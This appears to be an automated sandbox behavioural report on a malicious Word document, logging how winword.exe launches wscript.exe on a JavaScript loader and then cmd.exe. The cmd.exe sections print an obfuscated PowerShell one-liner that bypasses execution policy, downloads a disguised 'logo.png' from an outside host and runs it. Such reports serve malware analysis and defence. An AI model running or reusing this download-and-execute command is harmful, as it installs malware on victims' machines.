System	Get Time	type = Ticks, time = 186265	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:58 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 186265	1	Fn
System	Get Time	type = Performance Ctr, time = 24074309190	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffa90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xffa9d7f8	1	Fn
System	Get Time	type = Ticks, time = 186265	1	Fn
System	Get Time	type = Ticks, time = 187731	1	Fn
System	Get Time	type = Ticks, time = 187747	2	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x178

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 5593696		1	Fn

Process #35: wscript.exe

162

0

»

Information	Value
ID	#35
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:53, Reason: Child Process
Unmonitor	End Time: 00:02:01, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

»

Information	Value
PID	0x978
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8EC 0x 110 0x 764 0x BE4 0x 858 0x 364 0x 884 0x B84 0x ACC 0x ACC

Threads

Thread 0x8ec

161

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:57 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 184845	1	Fn
System	Get Time	type = Performance Ctr, time = 23931632933	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffa90000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 48, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 48, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 48, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 48, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:58 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 185890	1	Fn
System	Get Time	type = Performance Ctr, time = 24036767964	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 185906	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = Lî%	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:58 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 186155	1	Fn
System	Get Time	type = Performance Ctr, time = 24063586094	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:58 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 186358	1	Fn
System	Get Time	type = Performance Ctr, time = 24082514058	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 186904	1	Fn
System	Get Time	type = Ticks, time = 186920	5	Fn
System	Get Time	type = Ticks, time = 186935	12	Fn
System	Get Time	type = Ticks, time = 186998	4	Fn
System	Get Time	type = Ticks, time = 187013	6	Fn
System	Get Time	type = Ticks, time = 187029	5	Fn
System	Get Time	type = Ticks, time = 187045	2	Fn
System	Get Time	type = Ticks, time = 187060	4	Fn
System	Get Time	type = Ticks, time = 187076	1	Fn
System	Get Time	type = Ticks, time = 187091	1	Fn
System	Get Time	type = Ticks, time = 187716	3	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x764

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 3889760		1	Fn

Process #36: wscript.exe

134

0

»

Information	Value
ID	#36
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:57, Reason: Child Process
Unmonitor	End Time: 00:02:04, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

»

Information	Value
PID	0x71c
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6D8 0x 760 0x 4B8 0x 4F4 0x 6EC 0x C1C 0x C24 0x C28 0x C44 0x C8C

Threads

Thread 0x6d8

133

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:00 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 187981	1	Fn
System	Get Time	type = Performance Ctr, time = 24245430100	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffa90000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 189151	1	Fn
System	Get Time	type = Performance Ctr, time = 24369527681	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 189463	1	Fn
System	Get Time	type = Performance Ctr, time = 24400361280	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	type = size	1	Fn
File	Read	size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:47:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 189572	1	Fn
System	Get Time	type = Performance Ctr, time = 24413439936	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 189744	3	Fn
System	Get Time	type = Ticks, time = 189759	8	Fn
System	Get Time	type = Ticks, time = 190040	7	Fn
System	Get Time	type = Ticks, time = 190056	8	Fn
System	Get Time	type = Ticks, time = 190071	4	Fn
System	Get Time	type = Ticks, time = 190212	2	Fn
System	Get Time	type = Ticks, time = 190227	4	Fn
System	Get Time	type = Ticks, time = 190243	3	Fn
System	Get Time	type = Ticks, time = 190414	1	Fn
System	Get Time	type = Ticks, time = 190430	1	Fn
System	Get Time	type = Ticks, time = 190446	1	Fn
System	Get Time	type = Ticks, time = 190570	2	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x4b8

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 154208		1	Fn

Process #37: cmd.exe

57

0

»

Information	Value
ID	#37
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:59, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:26

OS Process Information

»

Information	Value
PID	0x8c0
Parent PID	0x978 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 728

Threads

Thread 0x728

57

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:03 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 190914	1	Fn
System	Get Time	type = Performance Ctr, time = 24547266980	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xc54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #38: cmd.exe

57

0

»

Information	Value
ID	#38
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:59, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:26

OS Process Information

»

Information	Value
PID	0xb44
Parent PID	0x6a8 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7DC

Threads

Thread 0x7dc

57

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:03 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 191007	1	Fn
System	Get Time	type = Performance Ctr, time = 24557535269	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
